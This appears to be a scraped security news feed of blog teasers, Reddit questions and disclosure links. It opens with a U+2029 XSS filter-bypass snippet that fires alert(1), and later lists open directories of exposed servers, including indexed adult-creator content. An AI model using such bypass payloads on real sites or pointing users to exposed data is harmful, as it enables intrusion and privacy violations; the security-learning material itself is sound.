    Gareth Heyes shared an interesting XSS trick. Thinking about how browsers handle it, it felt like something that could be used for bypasses in several forms. It's a simple one, so let's look at it together 😎 U+2029 XSS #!@*%
alert(1) Normally, if you saw code that looks like the above, you would assume it could never execute. So shall we copy it and paste it into the browser? ??!?!? Yes, the alert fires. This works because the special character between the $ and alert, the Paragraph Separator, makes the browser split the code there when it parses it.
    Only developers? No, we need a scratch pad too! Boop!
    I often browse the App Store looking for fun apps. While doing so I found a tool that looked useful for security testing, tried it over the holidays, liked it, and am sharing it here on the blog. It's Boop. Boop: think of Boop as a scratch pad for developers. It's a small editor that lets you easily apply substitutions and other functions while writing or editing code and various kinds of data. The official GitHub introduces it as follows: A scriptable scratchpad for developers. In slow yet steady progress. In Boop, pressing CMD+b brings up the action list

    The devil is in the details [Authentication Bypass]
    Hello, I’m Taha. Today, I’ll go over one of the vulnerabilities I was rewarded for last month. I hope you enjoy this write-up. Continue reading on Medium »
    How To Start BBJ (Bug Bounty Journey)
    Hello Hacker’s & Security Guys Thanks for Your Support So Continue reading on Medium »
    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »
    Penetration Testing vs Bug Bounty
    When you have a fixed payload list, a fixed methodology, a fixed approach, then effectively penetration testing and bug bounty hunting are… Continue reading on Medium »
    How I found a critical P1 bug in 5 minutes using a cellphone — Bug Bounty
    Hello Hackers, I’m MrEmpy I’m 16 and welcome to my first article about a critical bug I found on mobile. Continue reading on Medium »
    First Bug Bounty Program found CORS (Cross Origin Resource Sharing ) Misconfiguration
    Hello fellow Security researchers and beginners , in this blog I will be explaining the CORS vulnerability and how I found a potential… Continue reading on Medium »

    End-2-End file transfer
    Hi, I want to download a file directly from a friend's computer, what's the most secure way to do it with an encrypted tunnel? submitted by /u/Spare_Prize1148 [link] [comments]
    GRC - recommend reading material
    Will be starting a new role in GRC in a couple of months time and wanted to see if anyone has great reading sources to help hit the ground running. Currently reading the business minded CISO which has helped quite a bit! submitted by /u/SecMac [link] [comments]
    Book Recommendations for Memory Level Security
    Hi, I would like to ask for book advice to understand how operating systems' memory level operations work. For example I want to understand how stack and heap level exploits work on both Windows and Linux systems and what security measures these operating systems have to prevent attacks like heap buffer overflow, process injection and hijacking etc. Where should I start to understand memory level operations on operating systems? Should I know programming languages like C because OSs are mostly written in C? submitted by /u/execute_sh [link] [comments]
    How safe are Password Managers Actually?
    Hi, both Bitwarden and 1password are open source. Can anyone in the backend team have a way to look at our passwords? I mean the devs who made those apps must have a way whatsoever? Being double sure before using. What are your thoughts? submitted by /u/TheRealistDude [link] [comments]
    How do blackhats monetize stolen accounts without being caught?
    Suppose a blackhat has gotten a victim's e-mail, banking, PayPal etc. account infos, how do they monetize this information without leaving a trail leading back to them? I can't make sense of this. Thanks. submitted by /u/DirectionProof710 [link] [comments]

    Arbitrary file read in Rocket.Chat-Desktop
    Rocket.Chat disclosed a bug submitted by sectex: https://hackerone.com/reports/943737

    Miscellaneous NSFW Content from Patreon, Onlyfans, Snapchat, Fansly etc..
    https://theporngrid.com/Uploads/Media/ There's a combination of images and videos from a bunch of different original sources, mostly onlyfans and the like. Everything here is used by ibradome.com (NSFW) for their embedded content I indexed the files: https://gist.githubusercontent.com/RedDeadRandy/bda22a2b6014315597df2259a03815e2/raw/fe1ba95b5d2ec0d2a3e7ebcce96db21c1eda0152/theporngrid_files.txt Some of it is watermarked to find out who the person is while others are a crapshoot. submitted by /u/TattedUp [link] [comments]
    /VIDEOS about China. mostly unexplored PD. to be safe NSFW
    submitted by /u/thats_dumberst [link] [comments]
    Large directory of film scripts, different formats
    http://nldslab.soe.ucsc.edu/charactercreator/film_corpus/film_20100519/all_imsdb_05_19_10/ submitted by /u/inoculatemedia [link] [comments]
    funeral parlour decor and accessories
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    GUARDARA is now free for independent security researchers and non-commercial open-source projects
    submitted by /u/JohnKeymanUK [link] [comments]
    Walkthrough — Hacktoria: Geolocation 08
    Back again with another Hacktoria geolocation walkthrough, this time on challenge 08. I must confess that this image took me a bit longer… Continue reading on Medium »  ( 7 min )
    OSCP preparation - Buffer Overflow: VANILLA EIP OVERWRITE AND SEH
    submitted by /u/CyberMasterV [link] [comments]
    GUARDARA, a software quality assurance platform to identify bugs and zero-day vulnerabilities at scale, is now free for individual security researchers and non-commercial open-source projects.
    submitted by /u/JohnKeymanUK [link] [comments]  ( 1 min )
    Software Defined Radio, Part 6: Building a Cellphone IMSI Catcher (Stingray)
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CVE-2022-24348 Argo CD Vulnerability and its impact on Kubernetes
    submitted by /u/rippatpop [link] [comments]  ( 1 min )
    A Curious Glitch in XSS Sanitizing
    When looking for ways to bypass XSS sanitizing (sanitizing, not filtering), I’ve figured out something interesting but almost useless… Continue reading on Medium »  ( 2 min )
    SecWiki News 2022-02-06 Review
    No news has been posted yet today. For more of the latest articles, visit SecWiki  ( 2 min )
    SysInternals — The Other Way Around
    We have all, at some point in our professional lives, used the SysInternals Suite. I personally have used these utilities… Continue reading on Medium »  ( 2 min )
    Attack Simulation (Why it is Important!) Part 2 — Get one’s ducks in a row
    Now, following the steps in part 1, we have the lab set up and running. It is essential to understand how things are working in the background… Continue reading on Medium »  ( 4 min )
    FreeBuf Morning Report | US indicts multiple "scam" call centers; an American hacker attacks North Korea's network
    Following a ransomware attack, oil loading and transshipment at several ports in Amsterdam and Rotterdam (Netherlands) and Antwerp (Belgium) were disrupted.  ( 1 min )
    Shuckworm Continues Cyber-Espionage Attacks Against Ukraine
    submitted by /u/dmchell [link] [comments]
    Learning V8 Exploitation from Scratch: CVE-2021-38001 (Part 6)
    Author: Hcamael@Knownsec 404 Lab. Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1); Learning V8 Exploitation from Scratch: The Generic V8 Exploit Chain (Part 2); Learning V8 Exploitation from Scratch: starctf 2019 OOB (Part 3); Learning V8 Exploitation from Scratch: CVE-2020-6507 (Part 4); Learning V8 Exploitation from Scratch: CVE-2021-30632 (Part 5). CVE-2021-380...
    [Translation] [Paper] The Raft Consensus Algorithm (with etcd/raft source code analysis) (USENIX, 2014)
    Translator's preface: This article is a translation of the USENIX 2014 paper In Search of an Understandable Consensus Algorithm (Extended Version), which proposed the now widely used Raft consensus algorithm. Before Raft, Paxos was practically synonymous with consensus algorithms, but it has two serious drawbacks: it is hard to understand precisely (even for professional researchers and professors in the field), and it is hard to implement correctly (it is complex, and parts of its theoretical description are vague). As a result, as the developers of Chubby (Google's Paxos-based distributed lock service, the foundation of many of Google's globally distributed systems) put it: "There are significant gaps between the description of the Paxos algorithm and the needs of a real-world system ... the final system will be based on an unproven protocol" [4]. For university professors there is a further practical difficulty: Paxos is complex and hard to understand, yet no other algorithm suitable for teaching exists to replace it. Therefore, driven by the needs of both academia and industry, Stanford PhD student Diego Ongaro and his advisor John Ousterhout proposed the Raft algorithm, whose primary design goal is understandability, which is why the paper is titled "In Search of an Understandable Consensus Algorithm". In the same spirit as the original's goal of understandability, this translation also aims at a better understanding of Raft. Therefore, besides adjusting the layout and adding a number of subheadings for web reading, this article also cross-references the etcd/raft v0.4 implementation; that version already implements most of the Raft protocol but has not yet been optimised for production, so its functions, variables and so on largely correspond to the paper, which helps greatly in understanding the algorithm. Given the translator's limited ability, omissions or errors are unavoidable; if in doubt, consult the original. The translation follows. Translator's preface; Abstract; 1 Introduction; 1.1 Background and purpose of this paper; 1.2 Summary of results; 1.3 Organization of this paper; 2 Replicated state machines …

    Is it possible to change the messages that are saved to iCloud
    Recently I’m dealing with a situation in which someone has edited the contents of a conversation in iMessages. I figured out how dates could be changed but now I want to know if it’s possible to make what’s saved to iCloud reflect what’s been created. submitted by /u/JasonTheTodd [link] [comments]  ( 1 min )
    How to proceed in the following hypothetical security breach scenario
    Hey, I was met with the following hypothetical scenario during a school exam, to which my answer was insufficient. I'd love to hear your takes on it if you don't mind. "Bank's backup data were left unsecured on a public server. Propose a solution to protect data from being misused when this happens again." Thank you. submitted by /u/Ok-Cow-3198 [link] [comments]  ( 2 min )
    A webserver on my home computer
    I am trying to run a webserver on my computer that can be reached from the Internet. From what I understood, I would need to configure my router to allow the incoming HTTP traffic to be forwarded to the webserver. However, for this to work, I would need to have a fixed public address, which is not the case for me. Is there a workaround to make this work without having to fix the IP on the ISP side? submitted by /u/spectnullbyte [link] [comments]  ( 3 min )
    "Technical skills" on a resume?
    I imagine I need something better than just listing the tools I can use. But then again I don't want something as generic as "DNS enumeration" or "Vulnerability Assessment". I've got decent work experience but I'm struggling to think of what I can put in the technical skills part that is useful but not bullshittery. submitted by /u/thehunter699 [link] [comments]  ( 1 min )
    Questions about Active Directory pentesting
    Hey everyone! I just started to look into AD stuff and I have a few questions. I hope this is the right subreddit for AD-related questions. If not, please direct me to the appropriate one. Questions: If I use LLMNR or IPv6 DNS poisoning and get the NTLM hash of a local admin, I can use that hash or the cracked password to access the machine he's an admin on. If I manage to fetch the hash of a domain admin, I can log into any machine on the domain including the domain controller. What can I do if I get the hash of a lowly domain user? I cannot log into any machine. Can I still authenticate against the DC to get info like users, policies, etc.? Does it make a difference if I only have the hash or the cracked password? If we are only a regular domain user, all we can do to escalate our privileges is kerberoasting, correct? Like, we can't do pass the hash / pass the password because we can't get any from a machine. And we can't do token impersonation because, again, we can't get onto any machine. I want to thank everyone in advance for answering any of these questions. Please correct me if I misunderstood anything. I'm really new to AD pentesting. submitted by /u/placeholderbagholder [link] [comments]  ( 3 min )
    When using Public WiFi.. is a VPN essential or should you just ensure you're using HTTPS?
    Hi all, Going travelling around the world and will likely rely on public WiFi hotspots. Do I definitely need a VPN, or just ensure I'm connecting to sites with HTTPS? What about if I use cellular instead? Do I need a VPN then? Please let me know your thoughts. Burge x submitted by /u/MyNamesBurge [link] [comments]  ( 3 min )
    Firefox JIT Use-After-Frees – Exploiting CVE-2020-26950
    Article URL: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/ Comments URL: https://news.ycombinator.com/item?id=30225843 Points: 1 # Comments: 0  ( 23 min )
    Shodan: Find Any Device Connected To The Internet
    IoT Devices Search Engine Continue reading on Medium »  ( 1 min )
    How to “build” an Information Security Industry at Home?
    Check out the following personal photos courtesy of Dancho Danchev which describe his experience in the information security industry. Continue reading on Medium »  ( 2 min )
    The UK “Freedom Convoy”
    I’ve been extremely tangentially following the Freedom Convoy activity as part of wider opposition-monitoring efforts, including… Continue reading on Medium »
    FIND THE CAMERA [KNIGHT-CTF]
    As it was mentioned, I needed to find the camera model number; I checked the EXIF of this image but found nothing. Again, after reviewing the image, I got to know… Continue reading on Medium »  ( 1 min )
    Solving Daily Bugle from TryHackMe Pt1
    Good morning, afternoon or evening, dear readers. Today I bring you my first publication on Medium, the solution of the room… Continue reading on Medium »  ( 2 min )
    [RedDev Series #4] Experimenting with SysWhisper2 and LLVM Obfuscator
    Some notes on setting up both LLVM obfuscator and SysWhisper2 in Visual Studio 2019. Continue reading on Medium »  ( 2 min )
    Dancho Danchev's Second Edition of "Cybercrime Forum Data Set for 2022" Available - 113GB Direct Torrent Download Available! Grab a Free Copy Today!
    Here we go. https://academictorrents.com/details/131080b57d568ca3d05794cde5a3d7774f890373 - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/details/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201 - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! https://academictorrents.com/download/131080b57d568ca3d05794cde5a3d7774f890373.torrent - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/download/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201.torrent - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! The compilation is also available here: https://www.kaggle.com/danchodanchev/dancho-danchevs-cybercrime-forum-data-set-torrent Stay tuned!
    Who is Dancho Danchev?
    Folks, Do you remember who I am? Do you need to do a historical check on the security industry, including me as an individual, my personal blog and all the socially-oriented work and contributions that I've made to the industry during the past ten years? If an image is worth a thousand words, consider going through these images which I just found and took photos of, and guess what - brace yourselves for the ultimate reality where I've officially spent over two decades actively working in and researching the security industry. What's my idea in publishing these images? My personal goal and motivation is to make it clear and to ensure that my readers truly know what I've been up to in terms of challenges and all the hard work that I've done and achieved over the past twenty years in the secur…
    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
    Does a master’s in cybersecurity and digital forensics require an engineering maths background, or is a Bachelor's in IT with topics like basic maths, discrete structures and numerical methods enough?
    What I know from my research is that different universities have different criteria, like Calculus I and II, but a basic undergrad IT course may not contain multiple maths topics like a computer science or engineering course does. So will a bachelor's in information technology be enough to later apply as an international student in different countries for an MSc in cyber forensics? submitted by /u/axyut [link] [comments]  ( 2 min )
    Server-Side Request Forgery to Internal SMTP Access
    An introduction to the SSRF attack can be read in a separate Medium post, Beginner Guide To Exploit Server Side Request Forgery (SSRF)… Continue reading on InfoSec Write-ups »  ( 2 min )
    Server-Side Request Forgery to Internal SMTP Access — Indonesia
    To learn the basics of SSRF, you can read Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability — Indonesia. Continue reading on Medium »  ( 2 min )
    All About the CSRF vulnerability
    This Blog is all about the CSRF Vulnerabilities and Lot more BOOM !!!!!!!!!! Continue reading on Medium »  ( 4 min )
    What I’ve learned from hunting bugs for 2 months?
    Bug bounty hunting, a glamourous life of 100k bounties followed by Lamborghini pics on social media. If you are alive and in the part of… Continue reading on Medium »  ( 3 min )
    IDOR with Autorize!
    Here is my write-up, I’m gonna tell you about my recent finding and my first IDOR(Insecure direct object references). Continue reading on Medium »  ( 2 min )
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
    oniongrok: Onion addresses for anything.
    submitted by /u/oniongrok [link] [comments]  ( 1 min )
    Testing Infrastructure-as-Code Using Dynamic Tooling
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CISSP Domain 1 - Episode 4 - Business Case, Types of Project Plans, Organizational Process, Change Management and Data Classification by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
    SecWiki News 2022-02-05 Review
    A supplement to the new technique for bypassing WAFs with Java deserialization data, by ourren; Serial: Evolving Advanced Threat Governance (Part 5), by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
    Vulnerability Disclosure Programs Done the Right Way
    Article URL: https://www.lutasecurity.com/post/vulnerability-disclosure-programs-done-the-right-way Comments URL: https://news.ycombinator.com/item?id=30221511 Points: 2 # Comments: 0  ( 3 min )
    beer labels, sorted by country.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    interior design/architecture photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    O_D Movies/
    https://203.51.37.9:9802/Movies/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Learning V8 Exploitation from Scratch: CVE-2021-30632 (Part 5)
    Author: Hcamael@Knownsec 404 Lab. Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1); Learning V8 Exploitation from Scratch: The Generic V8 Exploit Chain (Part 2); Learning V8 Exploitation from Scratch: starctf 2019 OOB (Part 3); Learning V8 Exploitation from Scratch: CVE-2020-6507 (Part 4). Reproducing CVE-2021-30632: the third vulnerability studied is CVE-2021-30632, whose chrom...
    Philippine Department of the Interior -=-=[ O_D ]=-=-
    http://www.downloads.region10.dilg.gov.ph/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Hazardous material compliance reports
    http://13.113.60.173:81/output/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Jackpot
    http://dhakaftp.com/Data/ Lots of movies. Really good Download speeds. look for "English movies" or "Hollywood" in folders for movies in English. Try to take it easy as to not overwhelm the site. submitted by /u/soulkrypto [link] [comments]
    Nobel OD server in Romania
    submitted by /u/stereoroid [link] [comments]  ( 1 min )
    DD-WRT Post Attack Forensics
    Hello all, I recently discovered my router running DD-WRT has been hacked. What I mean by that is, I got an email from ISP about abuse which indicated my IP has been brute forcing ssh. I went to investigate and noticed my DD-WRT WebGUI is disabled and that my ESXI lab (which had default creds since it was a small lab and not exposed to internet) had been tampered with. I have removed power from the infected router and gotten back online with a cheap walmart backup, but I want to investigate this and get my infected router back online safely without losing evidence. Any DD-WRT advice would be appreciated as to how I should start my analysis. Thanks submitted by /u/the_grey_philosopher [link] [comments]  ( 2 min )
    Why are so many ports open on Xiaomi router?
    https://imgur.com/a/zSorMtG submitted by /u/Tqis [link] [comments]  ( 1 min )
    Port Ranges Set to DENY in UFW (Firewall) are Still Allowing Traffic on Those Ports
    Hey all, Here is a screen grab of ‘grep “Failed password” /var/log/auth.log’ for reference: https://imgur.com/a/G2bwrZO I have the port range 30999:59999 set to DENY IN from ANYWHERE for udp and tcp traffic, yet I’m still receiving login attempts within the ranges of blocked ports. Can anybody spot a misconfiguration, or perhaps explain what I’m missing with UFW? submitted by /u/OffishalFish [link] [comments]  ( 1 min )
    Hardening guides primarily for Microsoft products
    Hi everyone, I remember that the NSA used to make the de facto hardening guide for Windows/AD environments. However, I can only find one relating to Windows Server 2000. Are there any modern versions of that relating to the Microsoft/Azure/AD environments from another trusted instance, not some company trying to sell a product? Thank you for all your support. submitted by /u/Adrixan [link] [comments]  ( 1 min )
    Need help understanding XXE Injection
    So, I was practicing XXE labs on the PortSwigger Web Security Academy and I came across a DTD payload with the character "%" in the nested entities. I tried to find if there is a syntax specification for this in XML but found nothing regarding it; all I found by googling this are just some more XML payloads. So, does anybody have any idea what these characters exactly are and what they do? I am thinking these are only used in nested entity definitions, is that correct? I am totally confused. Any help would be greatly appreciated. PS: I am a complete newbie. So, if this is a stupid question, forgive me! submitted by /u/DeadTree_22 [link] [comments]  ( 1 min )
    Fml it’s pronounced demon!
    I did not know that daemon is pronounced demon. Maybe someone else will see this and learn too. submitted by /u/lowkiwatchingyou [link] [comments]  ( 2 min )
    Do I need to be good at programming (C to be more specific) in order to get ahead in my CyberSecurity field?
    The moment I started my first year of college (1st sem), the college gave us the syllabus for C. I'm pretty bad at it because C isn't something I had dealt with firsthand last year, and tbh I'm a Python kind of guy; I've only worked with Python, so C isn't an area of interest for me. So my question is: do I need to be very good at C? Is it going to be relevant somehow later in the hacking field? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Edge Filelinks
    In newer versions of edge filelinks (e.g. to a unc path) are blocked by default. Are there any security issues allowing filelinks for secure intranet zones? It can be activated via policy https://docs.microsoft.com/en-us/deployedge/microsoft-edge-policies Thanks! submitted by /u/montyspinneratz [link] [comments]
    Best WiFi card for penetration testing, passive mode, injection?
    I understand that my terminology might be a bit out of date. It's been a while; I know to research on my own. I want to know, though, what the best advice on here is for cracking 802.11 networks and such things. Last I checked it was the ALFA AWUS 036 N card; I have one, and then they released the 802.11n version. What is the gold standard these days? The best I can tell is actually nothing - with a strong password, WPA2, modern encryption... What are we dealing with these days? I still have my ALFA card and several other 802.11n cards that can inject packets. I just feel like there has been a lot of fragmentation over the last decade, and really, any opinions on whether or not the whole "WiFi hacking" gig is dead; well, I want your thoughts. submitted by /u/ValerieVexen [link] [comments]  ( 1 min )
    Apiiro team uncovers 0-day vulnerability in Argo CD
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30212283 Points: 1 # Comments: 0  ( 6 min )
    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
    Linux | Madaidan's Insecurities
    submitted by /u/Nhamatanda [link] [comments]
    Rooting Gryphon Routers via Shared VPN : 🎵 This LAN is your LAN, this LAN is my LAN 🎵
    submitted by /u/stargravy [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Nooie baby monitor
    submitted by /u/jaymzu [link] [comments]
    Silly proof of concept: Anti-phishing using perceptual hashing algorithms
    submitted by /u/anvilventures [link] [comments]  ( 2 min )
    Compromising out-of-bound secrets on Argo CD platform utilizing a malicious Kubernetes Helm Chart (CVE-2022-24348)
    submitted by /u/dalmoz [link] [comments]
    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
    Reflected XSS and Blind out of band command injection at subdomain dstuid-ww.dst.ibm.com
    IBM disclosed a bug submitted by smokin-ac3z: https://hackerone.com/reports/410334
    'net/http': HTTP Header Injection in the set_content_type method
    Ruby disclosed a bug submitted by chinarulezzz: https://hackerone.com/reports/1168205
    100 Days of Hacking — DAY 1
    Let’s see how it goes Continue reading on Medium »  ( 2 min )
    Threat Modelling
    Few words on Threat Modelling. Continue reading on Medium »
    Easy Understanding of Owasp Top 10-2021
    What is owasp ? Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - BUSINESS LOGIC VULNERABILITIES LAB SOLUTIONS
    A business logic vulnerability is a flaw in the design and implementation of a web application that allows an attacker to elicit unintended behaviour… Continue reading on Medium »  ( 15 min )
    Are all Websites Hackable? Why (not)?
    Frankly, no security is 100% secure. As infections continue to surge across the web, and attackers think of more innovative ways to remain undetected, many site owners wonder if they’ll be the next victim. In this article we’ll discuss what to look out for and consider when managing a website, why these hacks may occur, and how to lock down vulnerabilities. What kind of sites are the most vulnerable? No site is 100% fully secure because sites are managed by people, and people are fallible. Continue reading Are all Websites Hackable? Why (not)? at Sucuri Blog.
    SecWiki News 2022-02-04 Review
    No news has been posted yet today. For more of the latest articles, visit SecWiki  ( 2 min )
    How to avoid API blind spots in web application security testing
    APIs are a crucial part of modern web application development and make up a large chunk of your total web attack surface. Learn how Invicti helps organizations make API vulnerability testing an integral part of their secure SDLC. READ MORE  ( 4 min )
    Quiztime — Random OSINT Challenge 11
    On Jan 23, 2022, Quiztime (contributor @SEINT_pl) shared a new OSINT quiz with us. Continue reading on Medium »  ( 2 min )
    How to Track Down Cyber Threat Actors and FBI’s Most Wanted Cybercriminals Using OSINT and Maltego?
    Do you want to become famous? Did you know that an OSINT conducted today is a tax payer’s buck saved somewhere? Keep reading. Continue reading on Medium »  ( 8 min )
    A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis
    An image is worth a thousand words. Say no words! Related posts: An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the Almighty Savior! - An Analysis Dancho Danchev's Disappearance - An Elaboration - Part Two Dancho Danchev's Disappearance 2010 - Official Complaint Against Republic of Bulgaria Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Three Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Two Deep from the Trenches in Bulgaria - Part Three Deep from the Trenches in Bulgaria - Part Two How I Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria A Profile of a Bulgarian Kidnapper – Pavlin Georgiev (Павлин Георгиев/Васил Моев Гачевски/Явор Колев) – An Elaboration on Dancho Danchev’s Disappearance circa 2010 – An Analysis
    Winter Training Camp | The Diverse Styles of C2 in Advanced Threat Activity
    As a noun, C2 refers to the infrastructure controlled by an APT group, namely its IPs, domains and URLs.  ( 1 min )
    Hostapd/wpa_supplicant: new release v2.10 (with CVE fixes)
    Article URL: https://lists.infradead.org/pipermail/hostap/2022-January/040148.html Comments URL: https://news.ycombinator.com/item?id=30200900 Points: 1 # Comments: 0  ( 3 min )
    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
    Learning V8 Exploitation from Scratch: CVE-2020-6507 (Part 4)
    Author: Hcamael@Knownsec 404 Lab. Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1); Learning V8 Exploitation from Scratch: The Generic V8 Exploit Chain (Part 2); Learning V8 Exploitation from Scratch: starctf 2019 OOB (Part 3). Reproducing CVE-2020-6507. Information gathering: before reviewing the vulnerability, we first need an information-gathering phase. From Chrome's official update announcements we can learn which vulnerabilities a given Chrome version...
    Reload4j 1.2.18.5: A drop-in replacement for Log4j 1.2.17 and CVE fixes
    Article URL: https://reload4j.qos.ch/news.html Comments URL: https://news.ycombinator.com/item?id=30200504 Points: 2 # Comments: 0  ( 1 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
    What is considered more secure VPN client software on IoT device or IoT device behind VPN?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Passive log analysis software
    Hello, I am interested in whether there is a tool/software that will help me analyze logs from a web server, SSH and MySQL for intrusions, but on another PC. So I basically want to pull logs from many servers and run them through some software that can detect possible SQLi or path traversal attempts, something like that. I know there are Snort and SIEMs, but is there any software that will use, for example, Snort's engine and rules to do this analysis offline? Or can I run Snort on some log file from another server? P.S. possibly open source. Thanks. submitted by /u/P-e-t-a-r [link] [comments]  ( 5 min )
    OneNote Visibility
    Hi Guys. I like OneNote, and my org blocks anything else; I use it at work and at home. Three questions: If I log in to my work OneNote account on my personal Mac/Win/Linux computers, can my work track my computers at all, or see their MAC address or name? If I log in to my personal OneNote account on my work computer, can they read my OneNotes? Do the answers to the above two questions apply to all of OneDrive too? Appreciate any responses, as I've been told that it's all pretty private so I should be good to go with either. submitted by /u/bloqs [link] [comments]  ( 3 min )
    Chrome 99: CSS Cascade Layers, a New Picker for Input Elements, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 99 is beta as of February 3, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Preparing for Chrome 100 This year, Chrome will release version 100, adding a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduced a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 has been available since Chrome 96. For more information, se…
    Index of NASA's Land Processes Distributed Active Archive Center
    https://e4ftl01.cr.usgs.gov/ASTT/ ​ Some sort of unsecured government website. submitted by /u/Main_Force_Patrol [link] [comments]
    Indexes from Bornless.Grotto.Faith
    https://bornless.grotto.faith/pages/ https://bornless.grotto.faith/images/ submitted by /u/EmuAnon34 [link] [comments]
    Mozart Opera Omnia in FLAC format (200 CDs)
    http://rmeyer.comelitdns.com/Music/MOZART%20225/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    Doom 2 WADS
    submitted by /u/millhouse187 [link] [comments]  ( 1 min )
    Lots of movies and TV. Slow connection.
    submitted by /u/josephalbright1 [link] [comments]
    I need a search engine for stat.ameba.jp
    Several blogs from some J-Pop groups were deleted but the photos remain on ameba's servers. I have found a few (https://stat.ameba.jp/user_images/82/56/10138975701.jpg) but would like to search images I have in low quality on this site. submitted by /u/Alarod [link] [comments]
  • Open

    Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16)
    We continue to monitor Gamaredon. We mapped three large clusters of their infrastructure, identified potential malware testing activity and more. The post Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16) appeared first on Unit42.
  • Open

    Beethoven X Joins Balancer Labs’ Bug Bounty Program
    In April 2021, Balancer Labs decided to go big in pursuit of uncovering vulnerabilities in their V2 Vault architecture with the launch of… Continue reading on Balancer Protocol »  ( 2 min )
    [Bugbounty] SSRF — IFRAME INJECTION AND REFLECTED XSS
    Today I'm going to talk a bit about a flaw that led me to two reports; unfortunately both were duplicates, but it was good experience and… Continue reading on Medium »  ( 2 min )
    Subdomain Takeover Bugs — When They’re Applicable And When They’re Not
    At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking… Continue reading on Immunefi »  ( 3 min )
    Underrated Tool for Pass-The-Hash [Evil-WinRM]
    First of all, I'll describe what a Pass-The-Hash attack is. Continue reading on Medium »  ( 1 min )
  • Open

    A detailed analysis of Lazarus malware disguised as Notepad++ Shell Extension
    submitted by /u/CyberMasterV [link] [comments]
    NTLM Relaying - A comprehensive guide
    submitted by /u/jeanc0re [link] [comments]  ( 1 min )
    [CVE-2022-23602] Don't trust comments
    submitted by /u/crower [link] [comments]  ( 1 min )
    History of REvil: detailed report on the rise and fall of a Russian crime gang.
    submitted by /u/Jazzlike-Resource500 [link] [comments]
  • Open

    Interview questions for entry level incident response positions?
    I have an interview coming up soon. What sort of technical questions / scenario questions should I be expecting? Thx submitted by /u/tfulab23 [link] [comments]  ( 2 min )
    Photorec Issues
